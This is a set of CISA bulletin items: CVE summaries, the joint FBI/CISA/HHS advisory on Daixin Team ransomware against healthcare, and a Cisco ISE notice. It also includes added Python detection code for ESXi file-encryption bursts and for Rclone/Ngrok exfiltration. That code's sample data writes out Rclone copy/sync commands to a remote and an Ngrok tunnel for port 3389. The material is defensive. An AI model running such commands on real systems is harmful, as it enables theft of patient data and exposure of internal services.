exim — exim A vulnerability was found in Exim and classified as problematic. This issue affects the function dmarc_dns_lookup of the file dmarc.c of the component DMARC Handler. The manipulation leads to use after free. The attack may be initiated remotely. The name of the patch is 12fb3842f81bcbd4a4519d5728f2d7e0e3ca1445. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211919. 2022-10-20 not yet calculated CVE-2022-3620
N/A
N/A
f5 — big-ip In versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5, and all versions of 13.1.x, when BIG-IP is provisioned with PEM or AFM module, an undisclosed input can cause Traffic Management Microkernel (TMM) to terminate. 2022-10-19 not yet calculated CVE-2022-41813
MISC
f5 — big-ip In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, when a SIP profile is configured on a virtual server, undisclosed messages can cause an increase in memory resource utilization. 2022-10-19 not yet calculated CVE-2022-41832
MISC
f5 — big-ip In all BIG-IP 13.1.x versions, when an iRule containing the HTTP::collect command is configured on a virtual server, undisclosed requests can cause Traffic Management Microkernel (TMM) to terminate. 2022-10-19 not yet calculated CVE-2022-41833
MISC
f5 — big-ip When an ‘Attack Signature False Positive Mode’ enabled security policy is configured on a virtual server, undisclosed requests can cause the bd process to terminate. 2022-10-19 not yet calculated CVE-2022-41836
MISC
f5 — big-ip On specific hardware platforms, on BIG-IP versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, while Intel QAT (QuickAssist Technology) and the AES-GCM/CCM cipher is in use, undisclosed conditions can cause BIG-IP to send data unencrypted even with an SSL Profile applied. 2022-10-19 not yet calculated CVE-2022-41983
MISC
f5 — multiple_products In F5OS-A version 1.x before 1.1.0 and F5OS-C version 1.x before 1.5.0, excessive file permissions in F5OS allow an authenticated local attacker to execute a limited set of commands in a container and impact the F5OS controller. 2022-10-19 not yet calculated CVE-2022-41835
MISC
flux — flux Flux is an open and extensible continuous delivery solution for Kubernetes. Versions prior to 0.35.0 are subject to a Denial of Service. Users that have permissions to change Flux’s objects, either through a Flux source or directly within a cluster, can provide invalid data to fields `.spec.interval` or `.spec.timeout` (and structured variations of these fields), causing the entire object type to stop being processed. This issue is patched in version 0.35.0. As a workaround, Admission controllers can be employed to restrict the values that can be used for fields `.spec.interval` and `.spec.timeout`, however upgrading to the latest versions is still the recommended mitigation. 2022-10-22 not yet calculated CVE-2022-39272
CONFIRM
MISC
iowow — iowow IOWOW is a C utility library and persistent key/value storage engine. Versions 1.4.15 and prior contain a stack buffer overflow vulnerability that allows for Denial of Service (DOS) when it parses scientific notation numbers present in JSON. A patch for this issue is available at commit a79d31e4cff1d5a08f665574b29fd885897a28fd in the `master` branch of the repository. There are no workarounds other than applying the patch. 2022-10-21 not yet calculated CVE-2022-23462
CONFIRM
MISC
jadx — jadx jadx is a set of command line and GUI tools for producing Java source code from Android Dex and Apk files. Versions prior to 1.4.5 are subject to a Denial of Service when opening zip files with HTML sequences. This issue has been patched in version 1.4.5. There are no known workarounds. 2022-10-21 not yet calculated CVE-2022-39259
CONFIRM
jenkins — multiple_products A sandbox bypass vulnerability in Jenkins Pipeline: Deprecated Groovy Libraries Plugin 583.vf3b_454e43966 and earlier allows attackers with permission to define untrusted Pipeline libraries and to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. 2022-10-19 not yet calculated CVE-2022-43406
CONFIRM
MLIST
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920. 2022-10-20 not yet calculated CVE-2022-3621
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function follow_page_pte of the file mm/gup.c of the component BPF. The manipulation leads to race condition. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211921 was assigned to this vulnerability. 2022-10-20 not yet calculated CVE-2022-3623
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel and classified as problematic. Affected by this issue is the function rlb_arp_xmit of the file drivers/net/bonding/bond_alb.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211928. 2022-10-21 not yet calculated CVE-2022-3624
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3625
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3629
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects some unknown processing of the file fs/fscache/cookie.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211931. 2022-10-21 not yet calculated CVE-2022-3630
N/A
N/A
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function j1939_session_destroy of the file net/can/j1939/transport.c of the component IPsec. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211932. 2022-10-21 not yet calculated CVE-2022-3633
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3635
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935. 2022-10-21 not yet calculated CVE-2022-3636
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944. 2022-10-21 not yet calculated CVE-2022-3640
MISC
MISC
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. This affects the function rtl8188f_spur_calibration of the file drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c of the component Wireless. The manipulation of the argument hw_ctrl_s1/sw_ctrl_s1 leads to use of uninitialized variable. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211959. 2022-10-21 not yet calculated CVE-2022-3642
MISC
MISC
linux — linux_kernel A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3646
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992. 2022-10-21 not yet calculated CVE-2022-3649
N/A
N/A
nginx — nginx NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module. 2022-10-19 not yet calculated CVE-2022-41741
MISC
nginx — nginx NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted audio or video file. The issue affects only NGINX products that are built with the module ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module. 2022-10-19 not yet calculated CVE-2022-41742
MISC
nginx — nginx A vulnerability was found in Nginx and classified as problematic. This issue affects some unknown processing of the file ngx_resolver.c of the component IPv4 Off Handler. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211937 was assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3638
N/A
N/A
N/A
redis — redis A vulnerability, which was classified as problematic, was found in Redis. Affected is the function sigsegvHandler of the file debug.c of the component Crash Report. The manipulation leads to denial of service. The name of the patch is 0bf90d944313919eb8e63d3588bf63a367f020a3. It is recommended to apply a patch to fix this issue. VDB-211962 is the identifier assigned to this vulnerability. 2022-10-21 not yet calculated CVE-2022-3647
N/A
N/A
siemens — sieviellance_video_mobile_server_v2022_r2 A vulnerability has been identified in Siveillance Video Mobile Server V2022 R2 (All versions < V22.2a (80)). The mobile server component of affected applications improperly handles the log in for Active Directory accounts that are part of Administrators group. This could allow an unauthenticated remote attacker to access the application without a valid account. 2022-10-21 not yet calculated CVE-2022-43400
MISC
softing — opc_ua_c++_sdk An issue was discovered in Softing OPC UA C++ SDK before 6.10. A buffer overflow or an excess allocation happens due to unchecked array and matrix bounds in structure data types. 2022-10-20 not yet calculated CVE-2022-37453
MISC
MISC
softing — opc_ua_c++_sdk An issue was discovered in Softing OPC UA C++ SDK 5.66 through 6.x before 6.10. An OPC/UA browse request exceeding the server limit on continuation points may cause a use-after-free error. 2022-10-20 not yet calculated CVE-2022-39823
MISC
MISC
stmicroelectronics — stmicroelectronics A buffer overflow vulnerability in stm32_mw_usb_host of STMicroelectronics allows an attacker to execute arbitrary code when the descriptor contains more endpoints than USBH_MAX_NUM_ENDPOINTS. The library is typically integrated when using a RTOS such as FreeRTOS on STM32 MCUs. 2022-10-21 not yet calculated CVE-2021-42553
CONFIRM
wordpress — wordpress Auth. WordPress Options Change (siteurl, users_can_register, default_role, admin_email and new_admin_email) vulnerability in Biplob Adhikari’s Accordions – Multiple Accordions or FAQs Builder plugin (versions <= 2.0.3) on WordPress. 2022-10-21 not yet calculated CVE-2022-38104
CONFIRM
CONFIRM
xkcp — keccak_xkcp_sha-3 The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface. 2022-10-21 not yet calculated CVE-2022-37454
MISC
MISC
MISC
MISC


This product is provided subject to this Notification and this Privacy & Use policy.


#StopRansomware: Daixin Team

Original release date: October 21, 2022

CISA, the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have released a joint Cybersecurity Advisory (CSA), #StopRansomware: Daixin Team to provide information on the “Daixin Team,” a cybercrime group actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations. This joint CSA provides Daixin actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) obtained from FBI threat response activities and third-party reporting.

CISA encourages HPH Sector organizations to review #StopRansomware: Daixin Team and to apply the recommended Mitigations. See StopRansomware.gov for additional guidance on ransomware protection, detection, and response.


AA22-294A: #StopRansomware: Daixin Team

Original release date: October 21, 2022

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.


Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

  • As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
  • According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

  • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
  • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers. 

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note
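A triage heuristic for the file path and extension list given above, as an added example (not code from the advisory): given a datastore inventory of (path, modification time) pairs, it flags short windows in which targeted VM files in several VM directories changed together. The window length, the directory threshold, and the sample inventory are assumptions constructed for illustration.

```python
from collections import namedtuple
from pathlib import PurePosixPath

# Path and extensions exactly as listed in the advisory text.
DATASTORE_ROOT = "/vmfs/volumes/"
TARGET_EXTS = {".vmdk", ".vmem", ".vswp", ".vmsd", ".vmx", ".vmsn"}

Burst = namedtuple("Burst", "start end files vm_dirs")


def targeted(path):
    """True if the path is under the datastore root and has a targeted extension."""
    return (path.startswith(DATASTORE_ROOT)
            and PurePosixPath(path).suffix.lower() in TARGET_EXTS)


def find_bursts(records, window_s=600, min_vm_dirs=3):
    """Find windows where targeted files in many VM directories changed together.

    records: iterable of (path, mtime_epoch_seconds).
    window_s and min_vm_dirs are assumed thresholds; tune them per environment.
    A single VM being reconfigured or powered on touches one directory, so it
    stays below the threshold; a locker walking the datastore does not.
    """
    hits = sorted((mtime, path) for path, mtime in records if targeted(path))
    bursts, i, n = [], 0, len(hits)
    while i < n:
        # Grow the window anchored at hits[i] up to window_s seconds.
        j = i
        while j < n and hits[j][0] - hits[i][0] <= window_s:
            j += 1
        files = [path for _, path in hits[i:j]]
        vm_dirs = sorted({str(PurePosixPath(p).parent) for p in files})
        if len(vm_dirs) >= min_vm_dirs:
            bursts.append(Burst(hits[i][0], hits[j - 1][0], files, vm_dirs))
            i = j          # continue after the reported window
        else:
            i += 1
    return bursts


# Constructed sample inventory (not real data).
SAMPLE = [
    ("/vmfs/volumes/ds01/billing/billing.vmx", 1_000),       # routine reconfiguration
    ("/vmfs/volumes/ds01/pacs/pacs.vswp", 50_000),           # routine power-on
    ("/vmfs/volumes/ds01/ehr-db/ehr-db.vmdk", 100_000),
    ("/vmfs/volumes/ds01/ehr-db/ehr-db.vmx", 100_020),
    ("/vmfs/volumes/ds01/pacs/pacs.vmdk", 100_060),
    ("/vmfs/volumes/ds01/pacs/pacs.vmsd", 100_075),
    ("/vmfs/volumes/ds01/intranet/intranet.vmem", 100_130),
    ("/vmfs/volumes/ds01/lab/lab.vmsn", 100_200),
    ("/vmfs/volumes/ds01/lab/vmware.log", 100_201),          # not a targeted extension
    ("/tmp/copy/lab.vmx", 100_205),                          # outside the datastore root
]

if __name__ == "__main__":
    for b in find_bursts(SAMPLE):
        print(f"burst {b.start}..{b.end}: {len(b.files)} files in {len(b.vm_dirs)} VM dirs")
        for d in b.vm_dirs:
            print("  ", d)
```

A hit is a reason to check the flagged directories for a ransom note and unreadable VM files, not proof of encryption on its own.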

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].
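A hunt for the two exfiltration tools named above, run over process command lines, as an added example (not code from the advisory). It recognizes Rclone by its transfer subcommands and `name:path` remote syntax even when the binary has been renamed, and Ngrok by image name or a reference to it in the arguments. The event tuple layout, rule names, and sample events are assumptions constructed for illustration.

```python
import re
import shlex
from pathlib import PureWindowsPath

# rclone subcommands that move data.
RCLONE_TRANSFER = {"copy", "copyto", "sync", "move", "moveto"}
# ngrok subcommands that open a tunnel to a local service.
NGROK_TUNNEL = {"tcp", "http", "tls"}
# rclone addresses remote storage as "name:path". One letter before the colon
# is a Windows drive and "scheme://" is a URL, so neither counts as a remote.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:(?!//)")


def tokenize(cmdline):
    """Split a Windows command line; backslashes are literal, quotes are stripped."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:              # unbalanced quote: fall back to whitespace
        parts = cmdline.split()
    return [p.strip('"') for p in parts]


def classify(cmdline):
    """Return a list of (rule, detail) findings for one process command line."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = PureWindowsPath(tokens[0]).stem.lower()
    args = tokens[1:]
    findings = []

    # Rclone: a transfer verb plus a remote-style argument anywhere in the line.
    verb = next((a for a in args if a in RCLONE_TRANSFER), None)
    remote = next((a for a in args if REMOTE_RE.match(a)), None)
    if verb and remote:
        rule = "rclone_transfer" if image == "rclone" else "rclone_like_renamed"
        findings.append((rule, f"{verb} -> {remote}"))
    elif image == "rclone":
        findings.append(("rclone_present", " ".join(args)))

    # Ngrok: image name, or any argument that references it (e.g. ngrok.yml).
    if image == "ngrok" or any("ngrok" in a.lower() for a in args):
        idx = next((i for i, a in enumerate(args) if a in NGROK_TUNNEL), None)
        if idx is not None and idx + 1 < len(args):
            findings.append(("ngrok_tunnel", args[idx + 1]))
        else:
            findings.append(("ngrok_present", " ".join(args)))
    return findings


def hunt(events):
    """events: iterable of (host, user, cmdline). Returns flagged rows."""
    return [(host, user, rule, detail)
            for host, user, cmdline in events
            for rule, detail in classify(cmdline)]


# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    ("FS01", "svc_backup", r'"C:\ProgramData\rclone.exe" --config C:\ProgramData\r.conf '
                           r'copy D:\Shares\Radiology remote1:archive --transfers 16'),
    ("FS02", "admin2", r'C:\Windows\Temp\svchost.exe sync E:\Export remote1:archive'),
    ("JUMP01", "admin2", r'C:\Tools\ngrok.exe tcp 3389'),
    ("JUMP01", "admin2", r'C:\Tools\agent.exe http 8080 --config C:\Tools\ngrok.yml'),
    ("DEV07", "builder", r'aws s3 sync . s3://build-artifacts/nightly'),   # benign
    ("FS01", "jdoe", r'xcopy D:\Shares\Forms E:\Backup /s'),               # benign
]

if __name__ == "__main__":
    for row in hunt(SAMPLE_EVENTS):
        print(*row, sep=" | ")
```

The command-line shape check is what catches the renamed binary on FS02; matching on image name or file hash alone would miss it.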

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Tactic | Technique Title | ID | Use
Reconnaissance | Phishing for Information: Spearphishing Attachment | T1598.002 | Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.
Initial Access | Exploit Public-Facing Application | T1190 | Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.
Initial Access | Valid Accounts | T1078 | Daixin actors use previously compromised credentials to access servers on the target network.
Persistence | Account Manipulation | T1098 | Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.
Credential Access | OS Credential Dumping | T1003 | Daixin actors have sought to gain privileged account access through credential dumping.
Lateral Movement | Remote Service Session Hijacking: SSH Hijacking | T1563.001 | Daixin actors use SSH and RDP to move laterally across a network.
Lateral Movement | Remote Service Session Hijacking: RDP Hijacking | T1563.002 | Daixin actors use RDP to move laterally across a network.
Lateral Movement | Use Alternate Authentication Material: Pass the Hash | T1550.002 | Daixin actors have sought to gain privileged account access through pass the hash.
Exfiltration | Exfiltration Over Web Service | T1567 | Daixin Team members have used Ngrok for data exfiltration over web servers.
Impact | Data Encrypted for Impact | T1486 | Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes


Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

  • Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
  • Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
  • Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
  • Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
  • Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TLS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
  • Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
  • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.

In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
    • Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
      • Refer to applicable state data breach laws and consult legal counsel when necessary.
      • For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
    • See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software.
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organization.
  • Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

  • Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
  • Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
  • No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
  • Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3.
  • For additional best practices for healthcare cybersecurity issues, see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov.

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

  • Initial Publication: October 21, 2022

This product is provided subject to this Notification and this Privacy & Use policy.


Cisco Releases Security Update for Cisco Identity Services Engine 

Original release date: October 21, 2022

Cisco has released a security update to address vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing high and low severity vulnerabilities, see the Cisco Security Advisories page.

